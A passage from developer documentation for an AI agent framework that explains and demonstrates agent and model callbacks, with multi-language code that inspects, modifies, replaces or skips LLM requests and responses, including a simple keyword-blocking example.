Run the Agent --- async function main() { const runner = new InMemoryRunner({ agent: llmAgentWithAfterCb, appName: APP_NAME, }); // Create session 1: Agent output will be used as is (default empty state) await runner.sessionService.createSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_NORMAL_ID, }); // Create session 2: Agent output will be replaced by the callback await runner.sessionService.createSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_MODIFY_ID, state: { add_concluding_note: true }, // Set the state flag here }); // --- Scenario 1: Run where callback allows agent's original output --- console.log( ` ==================== SCENARIO 1: Running Agent on Session "${SESSION_NORMAL_ID}" (Should Use Original Output) ==================== ` ); const eventsNormal = runner.runAsync({ userId: USER_ID, sessionId: SESSION_NORMAL_ID, newMessage: createUserContent("Process this please."), }); for await (const event of eventsNormal) { if (isFinalResponse(event) && event.content?.parts?.length) { const finalResponse = event.content.parts .map((part: any) => part.text ?? "") .join(""); console.log( `Final Output: [${event.author}] ${finalResponse.trim()}` ); } else if (event.errorMessage) { console.log(`Error Event: ${event.errorMessage}`); } } // --- Scenario 2: Run where callback replaces the agent's output --- console.log( ` ==================== SCENARIO 2: Running Agent on Session "${SESSION_MODIFY_ID}" (Should Replace Output) ==================== ` ); const eventsModify = runner.runAsync({ userId: USER_ID, sessionId: SESSION_MODIFY_ID, newMessage: createUserContent("Process this and add note."), }); for await (const event of eventsModify) { if (isFinalResponse(event) && event.content?.parts?.length) { const finalResponse = event.content.parts .map((part: any) => part.text ?? 
"") .join(""); console.log( `Final Output: [${event.author}] ${finalResponse.trim()}` ); } else if (event.errorMessage) { console.log(`Error Event: ${event.errorMessage}`); } } } main(); ``` ```go package main import ( "context" "fmt" "log" "regexp" "strings" "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/model" "google.golang.org/adk/model/gemini" "google.golang.org/adk/runner" "google.golang.org/adk/session" "google.golang.org/adk/tool" "google.golang.org/adk/tool/functiontool" "google.golang.org/genai" ) func onAfterAgent(ctx agent.CallbackContext) (*genai.Content, error) { agentName := ctx.AgentName() invocationID := ctx.InvocationID() state := ctx.State() log.Printf("\n[Callback] Exiting agent: %s (Inv: %s)", agentName, invocationID) log.Printf("[Callback] Current State: %v", state) if addNote, _ := state.Get("add_concluding_note"); addNote == true { log.Printf("[Callback] State condition 'add_concluding_note=True' met: Replacing agent %s's output.", agentName) return genai.NewContentFromText( "Concluding note added by after_agent_callback, replacing original output.", genai.RoleModel, ), nil } log.Printf("[Callback] State condition not met: Using agent %s's original output.", agentName) return nil, nil } func runAfterAgentExample() { ctx := context.Background() geminiModel, err := gemini.NewModel(ctx, modelName, &genai.ClientConfig{}) if err != nil { log.Fatalf("FATAL: Failed to create model: %v", err) } llmCfg := llmagent.Config{ Name: "AgentWithAfterAgentCallback", AfterAgentCallbacks: []agent.AfterAgentCallback{onAfterAgent}, Model: geminiModel, Instruction: "You are a simple agent. 
Just say 'Processing complete!'", } testAgent, err := llmagent.New(llmCfg) if err != nil { log.Fatalf("FATAL: Failed to create agent: %v", err) } sessionService := session.InMemoryService() r, err := runner.New(runner.Config{AppName: appName, Agent: testAgent, SessionService: sessionService}) if err != nil { log.Fatalf("FATAL: Failed to create runner: %v", err) } log.Println("--- SCENARIO 1: Should use original output ---") runScenario(ctx, r, sessionService, appName, "session_normal", nil, "Process this.") log.Println("\n--- SCENARIO 2: Should replace output ---") runScenario(ctx, r, sessionService, appName, "session_modify", map[string]any{"add_concluding_note": true}, "Process and add note.") } ``` ```java import com.google.adk.agents.LlmAgent; import com.google.adk.agents.CallbackContext; import com.google.adk.events.Event; import com.google.adk.runner.InMemoryRunner; import com.google.adk.sessions.State; import com.google.genai.types.Content; import com.google.genai.types.Part; import io.reactivex.rxjava3.core.Flowable; import io.reactivex.rxjava3.core.Maybe; import java.util.HashMap; import java.util.List; import java.util.Map; import java.util.concurrent.ConcurrentHashMap; public class AfterAgentCallbackExample { // --- Constants --- private static final String APP_NAME = "after_agent_demo"; private static final String USER_ID = "test_user_after"; private static final String SESSION_ID_NORMAL = "session_run_normally"; private static final String SESSION_ID_MODIFY = "session_modify_output"; private static final String MODEL_NAME = "gemini-2.0-flash"; public static void main(String[] args) { AfterAgentCallbackExample demo = new AfterAgentCallbackExample(); demo.defineAgentAndRunScenarios(); } // --- 1. Define the Callback Function --- /** * Log exit from an agent and checks 'add_concluding_note' in session state. If True, returns new * Content to *replace* the agent's original output. 
If False or not present, returns * Maybe.empty(), allowing the agent's original output to be used. */ public Maybe modifyOutputAfterAgent(CallbackContext callbackContext) { String agentName = callbackContext.agentName(); String invocationId = callbackContext.invocationId(); State currentState = callbackContext.state(); System.out.printf("%n[Callback] Exiting agent: %s (Inv: %s)%n", agentName, invocationId); System.out.printf("[Callback] Current State: %s%n", currentState.entrySet()); Object addNoteFlag = currentState.get("add_concluding_note"); // Example: Check state to decide whether to modify the final output if (Boolean.TRUE.equals(addNoteFlag)) { System.out.printf( "[Callback] State condition 'add_concluding_note=True' met: Replacing agent %s's" + " output.%n", agentName); // Return Content to *replace* the agent's own output return Maybe.just( Content.builder() .parts( List.of( Part.fromText( "Concluding note added by after_agent_callback, replacing original output."))) .role("model") // Assign model role to the overriding response .build()); } else { System.out.printf( "[Callback] State condition not met: Using agent %s's original output.%n", agentName); // Return None - the agent's output produced just before this callback will be used. return Maybe.empty(); } } // --- 2. Setup Agent with Callback --- public void defineAgentAndRunScenarios() { LlmAgent llmAgentWithAfterCb = LlmAgent.builder() .name(APP_NAME) .model(MODEL_NAME) .description("An LLM agent demonstrating after_agent_callback for output modification") .instruction("You are a simple agent. Just say 'Processing complete!'") .afterAgentCallback(this::modifyOutputAfterAgent) // Assign the callback here .build(); // --- 3. 
Setup Runner and Sessions using InMemoryRunner --- // Use InMemoryRunner - it includes InMemorySessionService InMemoryRunner runner = new InMemoryRunner(llmAgentWithAfterCb, APP_NAME); // --- Scenario 1: Run where callback allows agent's original output --- System.out.printf( "%n%s SCENARIO 1: Running Agent (Should Use Original Output) %s%n", "=".repeat(20), "=".repeat(20)); // No initial state means 'add_concluding_note' will be false in the callback check runScenario( runner, llmAgentWithAfterCb.name(), // Use agent name for runner's appName consistency SESSION_ID_NORMAL, null, "Process this please."); // --- Scenario 2: Run where callback replaces the agent's output --- System.out.printf( "%n%s SCENARIO 2: Running Agent (Should Replace Output) %s%n", "=".repeat(20), "=".repeat(20)); Map modifyState = new HashMap<>(); modifyState.put("add_concluding_note", true); // Set the state flag here runScenario( runner, llmAgentWithAfterCb.name(), // Use agent name for runner's appName consistency SESSION_ID_MODIFY, new ConcurrentHashMap<>(modifyState), "Process this and add note."); } // --- 3. Method to Run a Single Scenario --- public void runScenario( InMemoryRunner runner, String appName, String sessionId, ConcurrentHashMap initialState, String userQuery) { // Create session using the runner's bundled session service runner.sessionService().createSession(appName, USER_ID, initialState, sessionId).blockingGet(); System.out.printf( "Running scenario for session: %s, initial state: %s%n", sessionId, initialState); Content userMessage = Content.builder().role("user").parts(List.of(Part.fromText(userQuery))).build(); Flowable eventStream = runner.runAsync(USER_ID, sessionId, userMessage); // Print final output eventStream.blockingForEach( event -> { if (event.finalResponse() && event.content().isPresent()) { String author = event.author() != null ? 
event.author() : "UNKNOWN"; String text = event .content() .flatMap(Content::parts) .filter(parts -> !parts.isEmpty()) .map(parts -> parts.get(0).text().orElse("").trim()) .orElse("[No text in final response]"); System.out.printf("Final Output for %s: [%s] %s%n", sessionId, author, text); } else if (event.errorCode().isPresent()) { System.out.printf( "Error Event for %s: %s%n", sessionId, event.errorMessage().orElse("Unknown error")); } }); } } ``` **Note on the `after_agent_callback` Example:** - **What it Shows:** This example demonstrates the `after_agent_callback`. This callback runs *right after* the agent's main processing logic has finished and produced its result, but *before* that result is finalized and returned. - **How it Works:** The callback function (`modify_output_after_agent`) checks a flag (`add_concluding_note`) in the session's state. - If the flag is `True`, the callback returns a *new* `types.Content` object. This tells the ADK framework to **replace** the agent's original output with the content returned by the callback. - If the flag is `False` (or not set), the callback returns `None` or an empty object. This tells the ADK framework to **use** the original output generated by the agent. - **Expected Outcome:** You'll see two scenarios: 1. In the session *without* the `add_concluding_note: True` state, the callback allows the agent's original output ("Processing complete!") to be used. 1. In the session *with* that state flag, the callback intercepts the agent's original output and replaces it with its own message ("Concluding note added..."). - **Understanding Callbacks:** This highlights how `after_` callbacks allow **post-processing** or **modification**. You can inspect the result of a step (the agent's run) and decide whether to let it pass through, change it, or completely replace it based on your logic. 
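The control flow behind the two agent lifecycle callbacks can be modeled in a few lines of plain Python. This is a minimal sketch, not ADK's runner code: `SketchContext`, `run_agent_with_callbacks`, and `fake_agent` are hypothetical names invented here, strings stand in for `types.Content`, and the real framework emits events rather than returning one value. It only illustrates the rules described above: a `before_` callback that returns content skips the agent (and the `after_` callback), while an `after_` callback that returns content replaces the agent's output.

```python
from dataclasses import dataclass, field
from typing import Callable, Optional


@dataclass
class SketchContext:
    """Hypothetical stand-in for CallbackContext (only what this sketch needs)."""
    agent_name: str
    state: dict = field(default_factory=dict)


# A callback returns replacement text, or None to let execution pass through.
AgentCallback = Callable[[SketchContext], Optional[str]]


def run_agent_with_callbacks(
    ctx: SketchContext,
    agent_logic: Callable[[SketchContext], str],
    before_cb: Optional[AgentCallback] = None,
    after_cb: Optional[AgentCallback] = None,
) -> str:
    """Simplified model of how the agent lifecycle callbacks gate a run."""
    if before_cb is not None:
        override = before_cb(ctx)
        if override is not None:
            # Gatekeeper: the agent is skipped, and so is the after callback.
            return override

    output = agent_logic(ctx)

    if after_cb is not None:
        replacement = after_cb(ctx)
        if replacement is not None:
            # Post-processing: the returned content replaces the agent's output.
            return replacement
    return output


def skip_if_flagged(ctx: SketchContext) -> Optional[str]:
    if ctx.state.get("skip_llm_agent", False):
        return f"Agent {ctx.agent_name} skipped by before_agent_callback due to state."
    return None


def add_note_if_flagged(ctx: SketchContext) -> Optional[str]:
    if ctx.state.get("add_concluding_note", False):
        return "Concluding note added by after_agent_callback, replacing original output."
    return None


def fake_agent(ctx: SketchContext) -> str:
    # Stands in for the LLM call made by a real LlmAgent.
    return "Processing complete!"


if __name__ == "__main__":
    for state in ({}, {"skip_llm_agent": True}, {"add_concluding_note": True}):
        ctx = SketchContext(agent_name="DemoAgent", state=dict(state))
        result = run_agent_with_callbacks(
            ctx, fake_agent, skip_if_flagged, add_note_if_flagged
        )
        print(f"state={state} -> {result}")
```

Keeping both callbacks on the same "return content or return nothing" contract means a single check (`is not None`) decides whether the framework's default behavior is overridden at either point.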
## LLM Interaction Callbacks These callbacks are specific to `LlmAgent` and provide hooks around the interaction with the Large Language Model. ### Before Model Callback **When:** Called just before the `generate_content_async` (or equivalent) request is sent to the LLM within an `LlmAgent`'s flow. **Purpose:** Allows inspection and modification of the request going to the LLM. Use cases include adding dynamic instructions, injecting few-shot examples based on state, modifying model config, implementing guardrails (like profanity filters), or implementing request-level caching. **Return Value Effect:** If the callback returns `None` (or a `Maybe.empty()` object in Java), the LLM continues its normal workflow. If the callback returns an `LlmResponse` object, then the call to the LLM is **skipped**. The returned `LlmResponse` is used directly as if it came from the model. This is powerful for implementing guardrails or caching. Code ```python # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
from google.adk.agents import LlmAgent from google.adk.agents.callback_context import CallbackContext from google.adk.models import LlmResponse, LlmRequest from google.adk.runners import Runner from typing import Optional from google.genai import types from google.adk.sessions import InMemorySessionService GEMINI_2_FLASH="gemini-2.0-flash" # --- Define the Callback Function --- def simple_before_model_modifier( callback_context: CallbackContext, llm_request: LlmRequest ) -> Optional[LlmResponse]: """Inspects/modifies the LLM request or skips the call.""" agent_name = callback_context.agent_name print(f"[Callback] Before model call for agent: {agent_name}") # Inspect the last user message in the request contents last_user_message = "" if llm_request.contents and llm_request.contents[-1].role == 'user': if llm_request.contents[-1].parts: last_user_message = llm_request.contents[-1].parts[0].text print(f"[Callback] Inspecting last user message: '{last_user_message}'") # --- Modification Example --- # Add a prefix to the system instruction original_instruction = llm_request.config.system_instruction or types.Content(role="system", parts=[]) prefix = "[Modified by Callback] " # Ensure system_instruction is Content and parts list exists if not isinstance(original_instruction, types.Content): # Handle case where it might be a string (though config expects Content) original_instruction = types.Content(role="system", parts=[types.Part(text=str(original_instruction))]) if not original_instruction.parts: original_instruction.parts.append(types.Part(text="")) # Add an empty part if none exist # Modify the text of the first part modified_text = prefix + (original_instruction.parts[0].text or "") original_instruction.parts[0].text = modified_text llm_request.config.system_instruction = original_instruction print(f"[Callback] Modified system instruction to: '{modified_text}'") # --- Skip Example --- # Check if the last user message contains "BLOCK" if "BLOCK" in 
last_user_message.upper(): print("[Callback] 'BLOCK' keyword found. Skipping LLM call.") # Return an LlmResponse to skip the actual LLM call return LlmResponse( content=types.Content( role="model", parts=[types.Part(text="LLM call was blocked by before_model_callback.")], ) ) else: print("[Callback] Proceeding with LLM call.") # Return None to allow the (modified) request to go to the LLM return None # Create LlmAgent and Assign Callback my_llm_agent = LlmAgent( name="ModelCallbackAgent", model=GEMINI_2_FLASH, instruction="You are a helpful assistant.", # Base instruction description="An LLM agent demonstrating before_model_callback", before_model_callback=simple_before_model_modifier # Assign the function here ) APP_NAME = "guardrail_app" USER_ID = "user_1" SESSION_ID = "session_001" # Session and Runner async def setup_session_and_runner(): session_service = InMemorySessionService() session = await session_service.create_session(app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID) runner = Runner(agent=my_llm_agent, app_name=APP_NAME, session_service=session_service) return session, runner # Agent Interaction async def call_agent_async(query): content = types.Content(role='user', parts=[types.Part(text=query)]) session, runner = await setup_session_and_runner() events = runner.run_async(user_id=USER_ID, session_id=SESSION_ID, new_message=content) async for event in events: if event.is_final_response(): final_response = event.content.parts[0].text print("Agent Response: ", final_response) # Note: In Colab, you can directly use 'await' at the top level. # If running this code as a standalone Python script, you'll need to use asyncio.run() or manage the event loop. await call_agent_async("write a joke on BLOCK") ``` ```typescript /** * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. 
* You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ import { LlmAgent, InMemoryRunner, CallbackContext, isFinalResponse, } from "@google/adk"; import { createUserContent } from "@google/genai"; const MODEL_NAME = "gemini-2.5-flash"; const APP_NAME = "before_model_callback_app"; const USER_ID = "test_user_before_model"; const SESSION_ID_BLOCK = "session_block_model_call"; const SESSION_ID_NORMAL = "session_normal_model_call"; // --- Define the Callback Function --- function simpleBeforeModelModifier({ context, request, }: { context: CallbackContext; request: any; }): any | undefined { console.log(`[Callback] Before model call for agent: ${context.agentName}`); // Inspect the last user message in the request contents const lastUserMessage = request.contents?.at(-1)?.parts?.[0]?.text ?? ""; console.log(`[Callback] Inspecting last user message: '${lastUserMessage}'`); // --- Modification Example --- // Add a prefix to the system instruction. // We create a deep copy to avoid modifying the original agent's config object. const modifiedConfig = JSON.parse(JSON.stringify(request.config)); const originalInstructionText = modifiedConfig.systemInstruction?.parts?.[0]?.text ?? 
""; const prefix = "[Modified by Callback] "; modifiedConfig.systemInstruction = { role: "system", parts: [{ text: prefix + originalInstructionText }], }; request.config = modifiedConfig; // Assign the modified config back to the request console.log( `[Callback] Modified system instruction to: '${modifiedConfig.systemInstruction.parts[0].text}'` ); // --- Skip Example --- // Check if the last user message contains "BLOCK" if (lastUserMessage.toUpperCase().includes("BLOCK")) { console.log("[Callback] 'BLOCK' keyword found. Skipping LLM call."); // Return an LlmResponse to skip the actual LLM call return { content: { role: "model", parts: [ { text: "LLM call was blocked by the before_model_callback." }, ], }, }; } console.log("[Callback] Proceeding with LLM call."); // Return undefined to allow the (modified) request to go to the LLM return undefined; } // --- Create LlmAgent and Assign Callback --- const myLlmAgent = new LlmAgent({ name: "ModelCallbackAgent", model: MODEL_NAME, instruction: "You are a helpful assistant.", // Base instruction description: "An LLM agent demonstrating before_model_callback", beforeModelCallback: simpleBeforeModelModifier, // Assign the function here }); // --- Agent Interaction Logic --- async function callAgentAndPrint( runner: InMemoryRunner, query: string, sessionId: string ) { console.log(`\n>>> Calling Agent with query: "${query}"`); let finalResponseContent = "No final response received."; const events = runner.runAsync({ userId: USER_ID, sessionId, newMessage: createUserContent(query) }); for await (const event of events) { if (isFinalResponse(event) && event.content?.parts?.length) { finalResponseContent = event.content.parts .map((part: { text?: string }) => part.text ?? 
"") .join(""); } } console.log("<<< Agent Response: ", finalResponseContent); } // --- Run Interactions --- async function main() { const runner = new InMemoryRunner({ agent: myLlmAgent, appName: APP_NAME }); // Scenario 1: The callback will find "BLOCK" and skip the model call await runner.sessionService.createSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_ID_BLOCK, }); await callAgentAndPrint( runner, "write a joke about BLOCK", SESSION_ID_BLOCK ); // Scenario 2: The callback will modify the instruction and proceed await runner.sessionService.createSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_ID_NORMAL, }); await callAgentAndPrint(runner, "write a short poem", SESSION_ID_NORMAL); } main(); ``` ```go package main import ( "context" "fmt" "log" "regexp" "strings" "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/model" "google.golang.org/adk/model/gemini" "google.golang.org/adk/runner" "google.golang.org/adk/session" "google.golang.org/adk/tool" "google.golang.org/adk/tool/functiontool" "google.golang.org/genai" ) func onBeforeModel(ctx agent.CallbackContext, req *model.LLMRequest) (*model.LLMResponse, error) { log.Printf("[Callback] BeforeModel triggered for agent %q.", ctx.AgentName()) // Modification Example: Add a prefix to the system instruction. if req.Config.SystemInstruction != nil { prefix := "[Modified by Callback] " // This is a simplified example; production code might need deeper checks. if len(req.Config.SystemInstruction.Parts) > 0 { req.Config.SystemInstruction.Parts[0].Text = prefix + req.Config.SystemInstruction.Parts[0].Text } else { req.Config.SystemInstruction.Parts = append(req.Config.SystemInstruction.Parts, &genai.Part{Text: prefix}) } log.Printf("[Callback] Modified system instruction.") } // Skip Example: Check for "BLOCK" in the user's prompt. 
for _, content := range req.Contents { for _, part := range content.Parts { if strings.Contains(strings.ToUpper(part.Text), "BLOCK") { log.Println("[Callback] 'BLOCK' keyword found. Skipping LLM call.") return &model.LLMResponse{ Content: &genai.Content{ Parts: []*genai.Part{{Text: "LLM call was blocked by before_model_callback."}}, Role: "model", }, }, nil } } } log.Println("[Callback] Proceeding with LLM call.") return nil, nil } func runBeforeModelExample() { ctx := context.Background() geminiModel, err := gemini.NewModel(ctx, modelName, &genai.ClientConfig{}) if err != nil { log.Fatalf("FATAL: Failed to create model: %v", err) } llmCfg := llmagent.Config{ Name: "AgentWithBeforeModelCallback", Model: geminiModel, BeforeModelCallbacks: []llmagent.BeforeModelCallback{onBeforeModel}, } testAgent, err := llmagent.New(llmCfg) if err != nil { log.Fatalf("FATAL: Failed to create agent: %v", err) } sessionService := session.InMemoryService() r, err := runner.New(runner.Config{AppName: appName, Agent: testAgent, SessionService: sessionService}) if err != nil { log.Fatalf("FATAL: Failed to create runner: %v", err) } log.Println("--- SCENARIO 1: Should proceed to LLM ---") runScenario(ctx, r, sessionService, appName, "session_normal", nil, "Tell me a fun fact.") log.Println("\n--- SCENARIO 2: Should be blocked by callback ---") runScenario(ctx, r, sessionService, appName, "session_blocked", nil, "write a joke on BLOCK") } ``` ```java import com.google.adk.agents.LlmAgent; import com.google.adk.agents.CallbackContext; import com.google.adk.events.Event; import com.google.adk.models.LlmRequest; import com.google.adk.models.LlmResponse; import com.google.adk.runner.InMemoryRunner; import com.google.adk.sessions.Session; import com.google.common.collect.ImmutableList; import com.google.common.collect.Iterables; import com.google.genai.types.Content; import com.google.genai.types.GenerateContentConfig; import com.google.genai.types.Part; import 
    io.reactivex.rxjava3.core.Flowable;
import io.reactivex.rxjava3.core.Maybe;
import java.util.ArrayList;
import java.util.List;

public class BeforeModelCallbackExample {

  // --- Define Constants ---
  private static final String AGENT_NAME = "ModelCallbackAgent";
  private static final String MODEL_NAME = "gemini-2.0-flash";
  private static final String AGENT_INSTRUCTION = "You are a helpful assistant.";
  private static final String AGENT_DESCRIPTION =
      "An LLM agent demonstrating before_model_callback";

  // For session and runner
  private static final String APP_NAME = "guardrail_app_java";
  private static final String USER_ID = "user_1_java";

  public static void main(String[] args) {
    BeforeModelCallbackExample demo = new BeforeModelCallbackExample();
    demo.defineAgentAndRun();
  }

  // --- 1. Define the Callback Function ---
  // Inspects/modifies the LLM request or skips the actual LLM call.
  public Maybe<LlmResponse> simpleBeforeModelModifier(
      CallbackContext callbackContext, LlmRequest llmRequest) {
    String agentName = callbackContext.agentName();
    System.out.printf("%n[Callback] Before model call for agent: %s%n", agentName);

    String lastUserMessage = "";
    if (llmRequest.contents() != null && !llmRequest.contents().isEmpty()) {
      Content lastContentItem = Iterables.getLast(llmRequest.contents());
      if ("user".equals(lastContentItem.role().orElse(null))
          && lastContentItem.parts().isPresent()
          && !lastContentItem.parts().get().isEmpty()) {
        lastUserMessage = lastContentItem.parts().get().get(0).text().orElse("");
      }
    }
    System.out.printf("[Callback] Inspecting last user message: '%s'%n", lastUserMessage);

    // --- Modification Example ---
    // Add a prefix to the system instruction
    Content systemInstructionFromRequest = Content.builder().parts(ImmutableList.of()).build();
    // Ensure system_instruction is Content and parts list exists
    if (llmRequest.config().isPresent()) {
      systemInstructionFromRequest =
          llmRequest
              .config()
              .get()
              .systemInstruction()
              .orElseGet(() ->
                  Content.builder().role("system").parts(ImmutableList.of()).build());
    }
    List<Part> currentSystemParts =
        new ArrayList<>(systemInstructionFromRequest.parts().orElse(ImmutableList.of()));
    // Ensure a part exists for modification
    if (currentSystemParts.isEmpty()) {
      currentSystemParts.add(Part.fromText(""));
    }
    // Modify the text of the first part
    String prefix = "[Modified by Callback] ";
    String conceptuallyModifiedText = prefix + currentSystemParts.get(0).text().orElse("");
    llmRequest =
        llmRequest.toBuilder()
            .config(
                GenerateContentConfig.builder()
                    .systemInstruction(
                        Content.builder()
                            .parts(List.of(Part.fromText(conceptuallyModifiedText)))
                            .build())
                    .build())
            .build();
    System.out.printf(
        "Modified System Instruction %s%n", llmRequest.config().get().systemInstruction());

    // --- Skip Example ---
    // Check if the last user message contains "BLOCK"
    if (lastUserMessage.toUpperCase().contains("BLOCK")) {
      System.out.println("[Callback] 'BLOCK' keyword found. Skipping LLM call.");
      // Return an LlmResponse to skip the actual LLM call
      return Maybe.just(
          LlmResponse.builder()
              .content(
                  Content.builder()
                      .role("model")
                      .parts(
                          ImmutableList.of(
                              Part.fromText("LLM call was blocked by before_model_callback.")))
                      .build())
              .build());
    }

    // Return Empty response to allow the (modified) request to go to the LLM
    System.out.println("[Callback] Proceeding with LLM call (using the original LlmRequest).");
    return Maybe.empty();
  }

  // --- 2. Define Agent and Run Scenarios ---
  public void defineAgentAndRun() {
    // Setup Agent with Callback
    LlmAgent myLlmAgent =
        LlmAgent.builder()
            .name(AGENT_NAME)
            .model(MODEL_NAME)
            .instruction(AGENT_INSTRUCTION)
            .description(AGENT_DESCRIPTION)
            .beforeModelCallback(this::simpleBeforeModelModifier)
            .build();

    // Create an InMemoryRunner
    InMemoryRunner runner = new InMemoryRunner(myLlmAgent, APP_NAME);
    // InMemoryRunner automatically creates a session service.
    // Create a session using the service
    Session session = runner.sessionService().createSession(APP_NAME, USER_ID).blockingGet();
    Content userMessage =
        Content.fromParts(
            Part.fromText("Tell me about quantum computing. This is a test. So BLOCK."));

    // Run the agent
    Flowable<Event> eventStream = runner.runAsync(USER_ID, session.id(), userMessage);

    // Stream event response
    eventStream.blockingForEach(
        event -> {
          if (event.finalResponse()) {
            System.out.println(event.stringifyContent());
          }
        });
  }
}
```

### After Model Callback

**When:** Called just after a response (`LlmResponse`) is received from the LLM, before it's processed further by the invoking agent.

**Purpose:** Allows inspection or modification of the raw LLM response. Use cases include:

- logging model outputs,
- reformatting responses,
- censoring sensitive information generated by the model,
- parsing structured data from the LLM response and storing it in `callback_context.state`,
- or handling specific error codes.

**Return Value Effect:** If the callback returns `None` (or a `Maybe.empty()` object in Java), the original `LlmResponse` is used unchanged. If the callback returns an `LlmResponse` object, that object is used in place of the model's response.

Code

```python
# Copyright 2025 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from google.adk.agents import LlmAgent from google.adk.agents.callback_context import CallbackContext from google.adk.runners import Runner from typing import Optional from google.genai import types from google.adk.sessions import InMemorySessionService from google.adk.models import LlmResponse from copy import deepcopy GEMINI_2_FLASH="gemini-2.0-flash" # --- Define the Callback Function --- def simple_after_model_modifier( callback_context: CallbackContext, llm_response: LlmResponse ) -> Optional[LlmResponse]: """Inspects/modifies the LLM response after it's received.""" agent_name = callback_context.agent_name print(f"[Callback] After model call for agent: {agent_name}") # --- Inspection --- original_text = "" if llm_response.content and llm_response.content.parts: # Assuming simple text response for this example if llm_response.content.parts[0].text: original_text = llm_response.content.parts[0].text print(f"[Callback] Inspected original response text: '{original_text[:100]}...'") # Log snippet elif llm_response.content.parts[0].function_call: print(f"[Callback] Inspected response: Contains function call '{llm_response.content.parts[0].function_call.name}'. No text modification.") return None # Don't modify tool calls in this example else: print("[Callback] Inspected response: No text content found.") return None elif llm_response.error_message: print(f"[Callback] Inspected response: Contains error '{llm_response.error_message}'. No modification.") return None else: print("[Callback] Inspected response: Empty LlmResponse.") return None # Nothing to modify # --- Modification Example --- # Replace "joke" with "funny story" (case-insensitive) search_term = "joke" replace_term = "funny story" if search_term in original_text.lower(): print(f"[Callback] Found '{search_term}'. 
Modifying response.") modified_text = original_text.replace(search_term, replace_term) modified_text = modified_text.replace(search_term.capitalize(), replace_term.capitalize()) # Handle capitalization # Create a NEW LlmResponse with the modified content # Deep copy parts to avoid modifying original if other callbacks exist modified_parts = [deepcopy(part) for part in llm_response.content.parts] modified_parts[0].text = modified_text # Update the text in the copied part new_response = LlmResponse( content=types.Content(role="model", parts=modified_parts), # Copy other relevant fields if necessary, e.g., grounding_metadata grounding_metadata=llm_response.grounding_metadata ) print(f"[Callback] Returning modified response.") return new_response # Return the modified response else: print(f"[Callback] '{search_term}' not found. Passing original response through.") # Return None to use the original llm_response return None # Create LlmAgent and Assign Callback my_llm_agent = LlmAgent( name="AfterModelCallbackAgent", model=GEMINI_2_FLASH, instruction="You are a helpful assistant.", description="An LLM agent demonstrating after_model_callback", after_model_callback=simple_after_model_modifier # Assign the function here ) APP_NAME = "guardrail_app" USER_ID = "user_1" SESSION_ID = "session_001" # Session and Runner async def setup_session_and_runner(): session_service = InMemorySessionService() session = await session_service.create_session(app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID) runner = Runner(agent=my_llm_agent, app_name=APP_NAME, session_service=session_service) return session, runner # Agent Interaction async def call_agent_async(query): session, runner = await setup_session_and_runner() content = types.Content(role='user', parts=[types.Part(text=query)]) events = runner.run_async(user_id=USER_ID, session_id=SESSION_ID, new_message=content) async for event in events: if event.is_final_response(): final_response = event.content.parts[0].text 
print("Agent Response: ", final_response) # Note: In Colab, you can directly use 'await' at the top level. # If running this code as a standalone Python script, you'll need to use asyncio.run() or manage the event loop. await call_agent_async("""write multiple time the word "joke" """) ``` ```typescript /** * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ import { LlmAgent, InMemoryRunner, CallbackContext, isFinalResponse, } from "@google/adk"; import { createUserContent } from "@google/genai"; const MODEL_NAME = "gemini-2.5-flash"; const APP_NAME = "after_model_callback_app"; const USER_ID = "test_user_after_model"; const SESSION_ID_JOKE = "session_modify_model_call"; const SESSION_ID_POEM = "session_normal_model_call"; // --- Define the Callback Function --- function simpleAfterModelModifier({ context, response, }: { context: CallbackContext; response: any; }): any | undefined { console.log( `[Callback] After model call for agent: ${context.agentName}` ); const modelResponseText = response.content?.parts?.[0]?.text ?? ""; console.log(`[Callback] Inspecting model response: "${modelResponseText.substring(0, 50)}..."`); // --- Modification Example --- // Replace "joke" with "funny story" (case-insensitive) const searchTerm = "joke"; const replaceTerm = "funny story"; if (modelResponseText.toLowerCase().includes(searchTerm)) { console.log(`[Callback] Found '${searchTerm}'. 
